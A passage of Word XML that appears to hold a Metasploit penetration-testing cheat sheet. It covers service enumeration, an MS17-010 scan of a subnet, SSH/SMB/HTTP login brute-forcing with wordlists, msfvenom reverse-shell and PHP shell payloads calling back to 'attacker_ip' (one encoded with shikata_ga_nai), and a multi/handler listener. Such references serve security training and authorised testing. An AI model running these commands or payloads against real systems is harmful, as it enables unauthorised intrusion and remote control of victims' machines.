    <w:p w14:paraId="3D4095CA" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># HTTP enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BF3AE6" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/http/http_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5043858F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/http/dir_scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4967B077" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/http/files_dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E9A630" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03995AEE" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># SSH enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D42079F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:lastRenderedPageBreak/>
        <w:t>use auxiliary/scanner/ssh/ssh_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592B2A37" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/ssh/ssh_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FF5672" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A444C8" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># FTP enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEF7FAD" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/ftp/ftp_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2801F394" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/ftp/anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEA4589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Database Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7A91A1" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Show database status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C31A6E1" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>db_status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DBD3F8" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="175F767C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Create workspace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44513F06" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>workspace -a project_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEBAA0F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>workspace project_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE7FC56" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C81E85" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Import scan results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2847C5C2" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>db_import nmap_scan.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647A7D77" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A2C1DD7" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Show discovered hosts/services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19819241" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD49697" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A1E390" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A3FACF" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED99578" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Search database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C47CDE6" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>hosts -S windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B2B7F7" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>services -p 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2848362E" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75534612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Vulnerability Scanners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B405B2" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># SMB vulnerability scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134B3989" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/smb/smb_ms17_010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EAF544" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOSTS 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD009E5" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17186804" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E5B226B" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Web application scanners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294428DB" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/http/ssl_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E02610" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/http/http_put</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5020F8BF" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:lastRenderedPageBreak/>
        <w:t>use auxiliary/scanner/http/backup_file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF3956D" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB8287F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Database scanners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F68F4A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/mysql/mysql_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE3ED16" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/mssql/mssql_ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190B51B7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Credential Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624AA275" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># SSH login testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64475F8F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/ssh/ssh_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2129D0DC" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3E4E94" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set USER_FILE /usr/share/wordlists/users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D59689E" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set PASS_FILE /usr/share/wordlists/passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0F61F8" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2E4880" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A0356F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># SMB login testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222EC27C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/smb/smb_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E7DCBF" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380C7317" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set SMBUser administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A7FBD1" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set SMBPass password123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57745F2F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26747B3F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DA8EC50" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># HTTP basic auth testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347E9D64" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/http/http_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7868E77B" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8557EF" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set AUTH_URI /admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758B6E92" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011DD5E6" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>Payload Generation and Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A37998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MSFVenom (Payload Generator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7CC065" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># List available payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEDB198" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>msfvenom --list payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC2D1F5" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FFD979F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Generate Windows reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAE6CBA" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:lastRenderedPageBreak/>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe &gt; shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648DFDB9" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="364BA076" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Generate Linux reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E57AB2F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f elf &gt; shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544ED528" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F544A60" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Generate PHP web shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB645D4" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f raw &gt; shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA1A0B8" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799F905A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Generate encoded payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7971C0E8" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe &gt; encoded_shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0279FF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Multi/Handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260EECE7" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Set up listener for reverse shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A3156A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C793F86" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5286E47A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set LHOST your_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF7EC45" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112FE5A4" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>exploit -j -z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75897E7F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C6B7A3" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Background the handler</w:t>
      </w:r>
    </w:p>
